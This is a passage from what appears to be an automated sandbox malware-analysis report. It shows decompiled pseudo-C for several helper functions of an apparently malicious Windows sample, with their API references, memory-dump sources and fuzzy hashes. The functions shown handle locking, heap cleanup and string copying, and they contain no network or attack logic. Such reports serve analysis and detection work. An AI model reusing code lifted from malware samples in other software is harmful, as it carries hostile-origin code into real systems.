                                                          0x04956865
                                                          0x0495686a
                                                          0x04956870
                                                          0x04956872
                                                          0x04956877
                                                          0x04956882
                                                          0x04956879
                                                          0x04956879
                                                          0x04956879
                                                          0x04956877
                                                          0x04956890

                                                          APIs
                                                          • memset.NTDLL ref: 0495684E
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,74B481D0), ref: 04956863
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 04956870
                                                          • CloseHandle.KERNEL32(?), ref: 04956882
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: CreateEvent$CloseHandlememset
                                                          • String ID:
                                                          • API String ID: 2812548120-0
                                                          • Opcode ID: d6e14c5abb855c5586d179f622c518d9d95766118bac4bc8eb856040d2c6d54c
                                                          • Instruction ID: 77aeee100dcafde5e0f782281f2ed380e37c86779d68acb4a6c847e9ecfad060
                                                          • Opcode Fuzzy Hash: d6e14c5abb855c5586d179f622c518d9d95766118bac4bc8eb856040d2c6d54c
                                                          • Instruction Fuzzy Hash: 58F0FEF15043087FD710AF66DCC4C27BBACEB95299B214E3EF54682521D676AC498B60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 049523F4, Relevance: 6.0, APIs: 4, Instructions: 29sleepmemoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 50%
                                                          			E049523F4(void** __esi) {
				char* _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0x495d32c; // 0x4dd95b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x495d32c; // 0x4dd95b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0x495d030) {
					HeapFree( *0x495d238, 0, _t8);
				}
				_t14[1] = E0495486F(_v0, _t14);
				_t11 =  *0x495d32c; // 0x4dd95b0
				_t12 = _t11 + 0x40;
				__imp__(_t12);
				return _t12;
			}










                                                          0x049523f4
                                                          0x049523f4
                                                          0x049523fd
                                                          0x0495240d
                                                          0x0495240d
                                                          0x04952412
                                                          0x04952417
                                                          0x00000000
                                                          0x00000000
                                                          0x04952407
                                                          0x04952407
                                                          0x04952419
                                                          0x0495241d
                                                          0x0495242f
                                                          0x0495242f
                                                          0x0495243f
                                                          0x04952442
                                                          0x04952447
                                                          0x0495244b
                                                          0x04952451

                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(04DD9570), ref: 049523FD
                                                          • Sleep.KERNEL32(0000000A,?,04955D25), ref: 04952407
                                                          • HeapFree.KERNEL32(00000000,00000000,?,04955D25), ref: 0495242F
                                                          • RtlLeaveCriticalSection.NTDLL(04DD9570), ref: 0495244B
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                          • String ID:
                                                          • API String ID: 58946197-0
                                                          • Opcode ID: 8b66f13373abf038943e3a0048f6c62a041135549bba06cf1f87bed61b188dd8
                                                          • Instruction ID: d6b1994d9395d26c7313908ee33f91a07631bb79e95ee2275d0b42ec3066415e
                                                          • Opcode Fuzzy Hash: 8b66f13373abf038943e3a0048f6c62a041135549bba06cf1f87bed61b188dd8
                                                          • Instruction Fuzzy Hash: 98F0B2706093809BEB50DF78E948B167BECEF19785B348564F941DA260C638EC818B25
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04951B42, Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E04951B42() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x495d26c; // 0x2b4
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x495d2bc; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x495d26c; // 0x2b4
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x495d238; // 0x49e0000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                                                          0x04951b42
                                                          0x04951b49
                                                          0x04951b93
                                                          0x04951b95
                                                          0x04951b95
                                                          0x04951b4d
                                                          0x04951b53
                                                          0x04951b58
                                                          0x04951b5c
                                                          0x04951b62
                                                          0x04951b69
                                                          0x00000000
                                                          0x00000000
                                                          0x04951b6b
                                                          0x04951b70
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x04951b70
                                                          0x04951b72
                                                          0x04951b7a
                                                          0x04951b7d
                                                          0x04951b7d
                                                          0x04951b83
                                                          0x04951b8a
                                                          0x04951b8d
                                                          0x04951b8d
                                                          0x00000000

                                                          APIs
                                                          • SetEvent.KERNEL32(000002B4,00000001,04954F0E), ref: 04951B4D
                                                          • SleepEx.KERNEL32(00000064,00000001), ref: 04951B5C
                                                          • CloseHandle.KERNEL32(000002B4), ref: 04951B7D
                                                          • HeapDestroy.KERNEL32(049E0000), ref: 04951B8D
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: CloseDestroyEventHandleHeapSleep
                                                          • String ID:
                                                          • API String ID: 4109453060-0
                                                          • Opcode ID: 548b076b04c1903bcd394335210f699fd0e0a8a14f308e663106091b09c0a62a
                                                          • Instruction ID: b3dd61fd5e49e80b00feba34ff5c6397143949095c84d5fbe2dadd7b771c045f
                                                          • Opcode Fuzzy Hash: 548b076b04c1903bcd394335210f699fd0e0a8a14f308e663106091b09c0a62a
                                                          • Instruction Fuzzy Hash: 38F0F871A093119BEA109A35F849F163E9CEB04B61B294330FC08D72A4EB28EC409760
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04956702, Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 37%
                                                          			E04956702() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x495d32c; // 0x4dd95b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x495d32c; // 0x4dd95b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x495d32c; // 0x4dd95b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x495e81a) {
					HeapFree( *0x495d238, 0, _t10);
					_t7 =  *0x495d32c; // 0x4dd95b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                                                          0x04956702
                                                          0x0495670b
                                                          0x0495671b
                                                          0x0495671b
                                                          0x04956720
                                                          0x04956725
                                                          0x00000000
                                                          0x00000000
                                                          0x04956715
                                                          0x04956715
                                                          0x04956727
                                                          0x0495672c
                                                          0x04956730
                                                          0x04956743
                                                          0x04956749
                                                          0x04956749
                                                          0x04956752
                                                          0x04956754
                                                          0x04956758
                                                          0x0495675e

                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(04DD9570), ref: 0495670B
                                                          • Sleep.KERNEL32(0000000A,?,04955D25), ref: 04956715
                                                          • HeapFree.KERNEL32(00000000,?,?,04955D25), ref: 04956743
                                                          • RtlLeaveCriticalSection.NTDLL(04DD9570), ref: 04956758
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                          • String ID:
                                                          • API String ID: 58946197-0
                                                          • Opcode ID: cf473385c7a9d8e643287124ba77da9bbed96bc18b2c63c5082bb784cc02119a
                                                          • Instruction ID: d96740e49d647a248240521df42954a877677570c4eac30ba53c597b5a953fdf
                                                          • Opcode Fuzzy Hash: cf473385c7a9d8e643287124ba77da9bbed96bc18b2c63c5082bb784cc02119a
                                                          • Instruction Fuzzy Hash: 09F0D474A083009BEB18CF74E999F197BEDEB49755B648139E906D7270C738EC00CB11
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04955AF1, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 58%
                                                          			E04955AF1(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E0495A71F(_t2);
				if(_t34 != 0) {
					_t30 = E0495A71F(_t28);
					if(_t30 == 0) {
						E0495A734(_t34);
					} else {
						_t39 = _a4;
						_t22 = E0495A782(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E0495A782(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














                                                          0x04955af1
                                                          0x04955afb
                                                          0x04955afd
                                                          0x04955b03
                                                          0x04955b03
                                                          0x04955b0c
                                                          0x04955b10
                                                          0x04955b1c
                                                          0x04955b20
                                                          0x04955b94
                                                          0x04955b22
                                                          0x04955b22
                                                          0x04955b26
                                                          0x04955b2b
                                                          0x04955b30
                                                          0x04955b4a
                                                          0x04955b39
                                                          0x04955b39
                                                          0x04955b3d
                                                          0x04955b40
                                                          0x04955b45
                                                          0x04955b45
                                                          0x04955b4f
                                                          0x04955b77
                                                          0x04955b7d
                                                          0x04955b80
                                                          0x04955b51
                                                          0x04955b53
                                                          0x04955b5b
                                                          0x04955b66
                                                          0x04955b6b
                                                          0x04955b6b
                                                          0x04955b87
                                                          0x04955b8e
                                                          0x04955b8f
                                                          0x04955b8f
                                                          0x04955b20
                                                          0x04955b9f

                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,00000008,?,74B04D40,?,?,04953E08,?,?,?,?,00000102,049567B8,?,?,00000000), ref: 04955AFD
                                                            • Part of subcall function 0495A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04955595), ref: 0495A72B
                                                            • Part of subcall function 0495A782: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,04955B2B,00000000,00000001,00000001,?,?,04953E08,?,?,?,?,00000102), ref: 0495A790
                                                            • Part of subcall function 0495A782: StrChrA.SHLWAPI(?,0000003F,?,?,04953E08,?,?,?,?,00000102,049567B8,?,?,00000000,00000000), ref: 0495A79A
                                                          • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04953E08,?,?,?,?,00000102,049567B8,?), ref: 04955B5B
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04955B6B
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04955B77
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 3767559652-0
                                                          • Opcode ID: fce52e7ee20a7ebaf8566d8e9e9b91b16a83fecb4bac33d2e4b5308305cc7a99
                                                          • Instruction ID: 61b0dd41006fc75cbe9b740c3a4f284b37a5ac820e483e6e8b000806c06f6cd9
                                                          • Opcode Fuzzy Hash: fce52e7ee20a7ebaf8566d8e9e9b91b16a83fecb4bac33d2e4b5308305cc7a99
                                                          • Instruction Fuzzy Hash: 5221A175504215FFDB119F74C848AAE7FBAAF462A4B254170FD049B225D634E90087A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 049545C6, Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E049545C6(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E0495A71F(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








                                                          0x049545db
                                                          0x049545df
                                                          0x049545e9
                                                          0x049545ee
                                                          0x049545f3
                                                          0x049545f5
                                                          0x049545fd
                                                          0x04954602
                                                          0x04954610
                                                          0x04954615
                                                          0x0495461f

                                                          APIs
                                                          • lstrlenW.KERNEL32(004F0053,?,74B05520,00000008,04DD935C,?,04958D93,004F0053,04DD935C,?,?,?,?,?,?,0495523E), ref: 049545D6
                                                          • lstrlenW.KERNEL32(04958D93,?,04958D93,004F0053,04DD935C,?,?,?,?,?,?,0495523E), ref: 049545DD
                                                            • Part of subcall function 0495A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04955595), ref: 0495A72B
                                                          • memcpy.NTDLL(00000000,004F0053,74B069A0,?,?,04958D93,004F0053,04DD935C,?,?,?,?,?,?,0495523E), ref: 049545FD
                                                          • memcpy.NTDLL(74B069A0,04958D93,00000002,00000000,004F0053,74B069A0,?,?,04958D93,004F0053,04DD935C), ref: 04954610
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: lstrlenmemcpy$AllocateHeap
                                                          • String ID:
                                                          • API String ID: 2411391700-0
                                                          • Opcode ID: 5bc868e6c30ca510743a876650afc12e6d9245a26ebda2ee77300f05b9940e04
                                                          • Instruction ID: 6c37f2891b2f92e0255396936da89882cf3c366ac3ae689ee201885e470542d7
                                                          • Opcode Fuzzy Hash: 5bc868e6c30ca510743a876650afc12e6d9245a26ebda2ee77300f05b9940e04
                                                          • Instruction Fuzzy Hash: 5AF04F36900118BBDF11EFA8CC84C9F7BACEF482547214062ED08D7111E631EE158BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0495361A, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(04DD9A78,00000000,00000000,7742C740,049520ED,00000000), ref: 0495362A
                                                          • lstrlen.KERNEL32(?), ref: 04953632
                                                            • Part of subcall function 0495A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04955595), ref: 0495A72B
                                                          • lstrcpy.KERNEL32(00000000,04DD9A78), ref: 04953646
                                                          • lstrcat.KERNEL32(00000000,?), ref: 04953651
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                          • String ID:
                                                          • API String ID: 74227042-0
                                                          • Opcode ID: 3dccf047fafe144911b28f7f1469b4ec158c2cfdb911066b36f6c062b802710a
                                                          • Instruction ID: 80bd877111c9d94b928bd20c57ec1e95eda6a07a3423e0149427889f1004c2cf
                                                          • Opcode Fuzzy Hash: 3dccf047fafe144911b28f7f1469b4ec158c2cfdb911066b36f6c062b802710a
                                                          • Instruction Fuzzy Hash: 57E01273905721678B11ABF4AC48C5FBFADEFD96557240537FA00D7110C7299C058BA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%